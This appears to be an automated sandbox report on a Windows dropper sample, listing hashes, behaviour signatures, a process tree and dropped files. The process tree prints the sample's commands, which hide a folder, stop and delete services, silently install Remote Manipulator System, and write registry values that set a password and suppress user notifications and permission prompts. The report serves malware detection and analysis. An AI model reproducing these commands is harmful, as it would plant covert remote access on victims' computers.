Analysis
-
max time kernel
139s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
28-11-2022 09:31
Behavioral task
behavioral1
Sample
c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe
Resource
win7-20220901-en
General
-
Target
c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe
-
Size
3.4MB
-
MD5
bd24c43e22dd3f94763301227fcfaee4
-
SHA1
4751e53b9427b17f0dcc11ccd0f8a6867295fc5c
-
SHA256
c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2
-
SHA512
60c4bf3c419549d9cabb233ffb0e2aa0c4a6e00df1d9a94cbbc938a85e9becd71f3137b1ed9cfe1fb48ef62e3b58a670dc0c2308304693caf308465fcf84aefe
-
SSDEEP
98304:W23AzXk1YNwo3rtNJ7nRYorYHcdCUfxV:WeAzXSO3ZX7morqEb5
Malware Config
Signatures
-
Executes dropped EXE 7 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.exepid process 1356 rutserv.exe 1704 rutserv.exe 1916 rutserv.exe 804 rutserv.exe 1652 rfusclient.exe 1848 rfusclient.exe 672 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1492-55-0x0000000000400000-0x000000000078A000-memory.dmp upx behavioral1/memory/1160-77-0x0000000002350000-0x00000000029F9000-memory.dmp upx -
Loads dropped DLL 2 IoCs
Processes:
cmd.exerutserv.exepid process 1160 cmd.exe 804 rutserv.exe -
Drops file in Windows directory 17 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Windows\spom\15971.bat cmd.exe File opened for modification C:\Windows\spom\15971.bat cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File created C:\Windows\spom\vp8encoder.dll cmd.exe File opened for modification C:\Windows\spom\webmmux.dll cmd.exe File created C:\Windows\spom\rfusclient.exe cmd.exe File opened for modification C:\Windows\spom\rfusclient.exe cmd.exe File opened for modification C:\Windows\spom\webmvorbisdecoder.dll cmd.exe File opened for modification C:\Windows\spom attrib.exe File created C:\Windows\spom\vp8decoder.dll cmd.exe File opened for modification C:\Windows\spom\vp8decoder.dll cmd.exe File created C:\Windows\spom\webmmux.dll cmd.exe File created C:\Windows\spom\webmvorbisencoder.dll cmd.exe File opened for modification C:\Windows\spom\rutserv.exe cmd.exe File opened for modification C:\Windows\spom\vp8encoder.dll cmd.exe File created C:\Windows\spom\webmvorbisdecoder.dll cmd.exe File opened for modification C:\Windows\spom\webmvorbisencoder.dll cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 1648 sc.exe 868 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exepid process 1356 rutserv.exe 1356 rutserv.exe 1356 rutserv.exe 1356 rutserv.exe 1704 rutserv.exe 1704 rutserv.exe 1916 rutserv.exe 1916 rutserv.exe 804 rutserv.exe 804 rutserv.exe 804 rutserv.exe 804 rutserv.exe 1652 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 672 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rutserv.exerutserv.exerutserv.exedescription pid process Token: SeDebugPrivilege 1356 rutserv.exe Token: SeDebugPrivilege 1916 rutserv.exe Token: SeTakeOwnershipPrivilege 804 rutserv.exe Token: SeTcbPrivilege 804 rutserv.exe Token: SeTcbPrivilege 804 rutserv.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 1356 rutserv.exe 1704 rutserv.exe 1916 rutserv.exe 804 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.execmd.exenet.exenet.exedescription pid process target process PID 1492 wrote to memory of 1160 1492 c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe cmd.exe PID 1492 wrote to memory of 1160 1492 c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe cmd.exe PID 1492 wrote to memory of 1160 1492 c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe cmd.exe PID 1492 wrote to memory of 1160 1492 c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe cmd.exe PID 1160 wrote to memory of 1064 1160 cmd.exe net.exe PID 1160 wrote to memory of 1064 1160 cmd.exe net.exe PID 1160 wrote to memory of 1064 1160 cmd.exe net.exe PID 1160 wrote to memory of 1064 1160 cmd.exe net.exe PID 1064 wrote to memory of 296 1064 net.exe net1.exe PID 1064 wrote to memory of 296 1064 net.exe net1.exe PID 1064 wrote to memory of 296 1064 net.exe net1.exe PID 1064 wrote to memory of 296 1064 net.exe net1.exe PID 1160 wrote to memory of 592 1160 cmd.exe net.exe PID 1160 wrote to memory of 592 1160 cmd.exe net.exe PID 1160 wrote to memory of 592 1160 cmd.exe net.exe PID 1160 wrote to memory of 592 1160 cmd.exe net.exe PID 592 wrote to memory of 332 592 net.exe net1.exe PID 592 wrote to memory of 332 592 net.exe net1.exe PID 592 wrote to memory of 332 592 net.exe net1.exe PID 592 wrote to memory of 332 592 net.exe net1.exe PID 1160 wrote to memory of 868 1160 cmd.exe sc.exe PID 1160 wrote to memory of 868 1160 cmd.exe sc.exe PID 1160 wrote to memory of 868 1160 cmd.exe sc.exe PID 1160 wrote to memory of 868 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1648 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1648 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1648 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1648 1160 cmd.exe sc.exe PID 1160 wrote to memory of 1136 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1136 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1136 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1136 1160 cmd.exe reg.exe PID 1160 wrote to memory of 524 1160 cmd.exe attrib.exe PID 1160 wrote to memory of 524 1160 cmd.exe attrib.exe PID 1160 wrote to memory of 524 1160 cmd.exe attrib.exe PID 1160 wrote to memory of 524 1160 cmd.exe attrib.exe PID 1160 wrote to memory of 1356 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1356 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1356 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1356 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1704 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1704 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1704 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 1704 1160 cmd.exe rutserv.exe PID 1160 wrote to memory of 932 1160 cmd.exe reg.exe PID 1160 wrote to memory of 932 1160 cmd.exe reg.exe PID 1160 wrote to memory of 932 1160 cmd.exe reg.exe PID 1160 wrote to memory of 932 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1392 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1392 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1392 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1392 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1600 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1600 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1600 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1600 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1220 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1220 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1220 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1220 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1908 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1908 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1908 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1908 1160 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe"C:\Users\Admin\AppData\Local\Temp\c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\14C9.tmp\15971.bat" "2⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop netaservice3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice4⤵
-
C:\Windows\SysWOW64\net.exenet stop rmanservice3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete netaservice3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /silentinstall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /firewall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0070006c007500740075007300310032003300340035004000790061002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00360039004300410030003600430046002d0042004400450037002d0034003100320038002d0039003500410045002d003700310032003000420036003900410038004200450041007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e0074007200750065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800003⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a003⤵
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /start3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rutserv.exeC:\Windows\spom\rutserv.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\15971.batFilesize
10KB
MD53aa2d2d6003b6e054840f39c2b4b6eea
SHA129acb0d579b6914df1599c10c9222ec101f63375
SHA256cb90f99378b2ceffbf359d1762c246cffe4b2731b218d22854125eb387d3cfd9
SHA51296908ee5cff277e0a58d7b0b8648e661c81cf43df5dd2d7452c54efed29a42a2a5dc8a33084c4fb0343d169d7da8c88d1817b69d9c43bbd933348ae6716169ad
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\rutserv.exeFilesize
1.4MB
MD5a329f920e01574d2c58eb0626abef7bd
SHA12500ca31396264cf0a9492d879e493a9438404b9
SHA25676fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
SHA512dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\vp8decoder.dllFilesize
127KB
MD5bda3c03c3e5d65922a311009e0ae8cd6
SHA137093c457ac5f01649b4d23a3d075a531af08baa
SHA25630dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\vp8encoder.dllFilesize
238KB
MD5200cba4b9cbdd64f1a281b89cd1467f3
SHA1fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA51215a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\webmmux.dllFilesize
90KB
MD5aa78ed008f72533c7136bf6d4bddb0d0
SHA12e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA25641e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\webmvorbisdecoder.dllFilesize
141KB
MD50867a260483876336a727cf9f2928b13
SHA13c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
-
C:\Users\Admin\AppData\Local\Temp\14C9.tmp\webmvorbisencoder.dllFilesize
202KB
MD543adc4acd56c56b0a25664954c7aa80c
SHA1d9085625b4a39b3969db8047ad3224b3fc9f60fc
SHA2560e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
-
C:\Windows\spom\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Windows\spom\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Windows\spom\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Windows\spom\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
C:\Windows\spom\rutserv.exeFilesize
1.4MB
MD5a329f920e01574d2c58eb0626abef7bd
SHA12500ca31396264cf0a9492d879e493a9438404b9
SHA25676fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
SHA512dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
-
C:\Windows\spom\rutserv.exeFilesize
1.4MB
MD5a329f920e01574d2c58eb0626abef7bd
SHA12500ca31396264cf0a9492d879e493a9438404b9
SHA25676fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
SHA512dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
-
C:\Windows\spom\rutserv.exeFilesize
1.4MB
MD5a329f920e01574d2c58eb0626abef7bd
SHA12500ca31396264cf0a9492d879e493a9438404b9
SHA25676fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
SHA512dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
-
C:\Windows\spom\rutserv.exeFilesize
1.4MB
MD5a329f920e01574d2c58eb0626abef7bd
SHA12500ca31396264cf0a9492d879e493a9438404b9
SHA25676fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
SHA512dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
-
C:\Windows\spom\vp8decoder.dllFilesize
127KB
MD5bda3c03c3e5d65922a311009e0ae8cd6
SHA137093c457ac5f01649b4d23a3d075a531af08baa
SHA25630dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
-
C:\Windows\spom\vp8encoder.dllFilesize
238KB
MD5200cba4b9cbdd64f1a281b89cd1467f3
SHA1fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA51215a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
-
C:\Windows\spom\webmmux.dllFilesize
90KB
MD5aa78ed008f72533c7136bf6d4bddb0d0
SHA12e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA25641e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
-
C:\Windows\spom\webmvorbisdecoder.dllFilesize
141KB
MD50867a260483876336a727cf9f2928b13
SHA13c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
-
C:\Windows\spom\webmvorbisencoder.dllFilesize
202KB
MD543adc4acd56c56b0a25664954c7aa80c
SHA1d9085625b4a39b3969db8047ad3224b3fc9f60fc
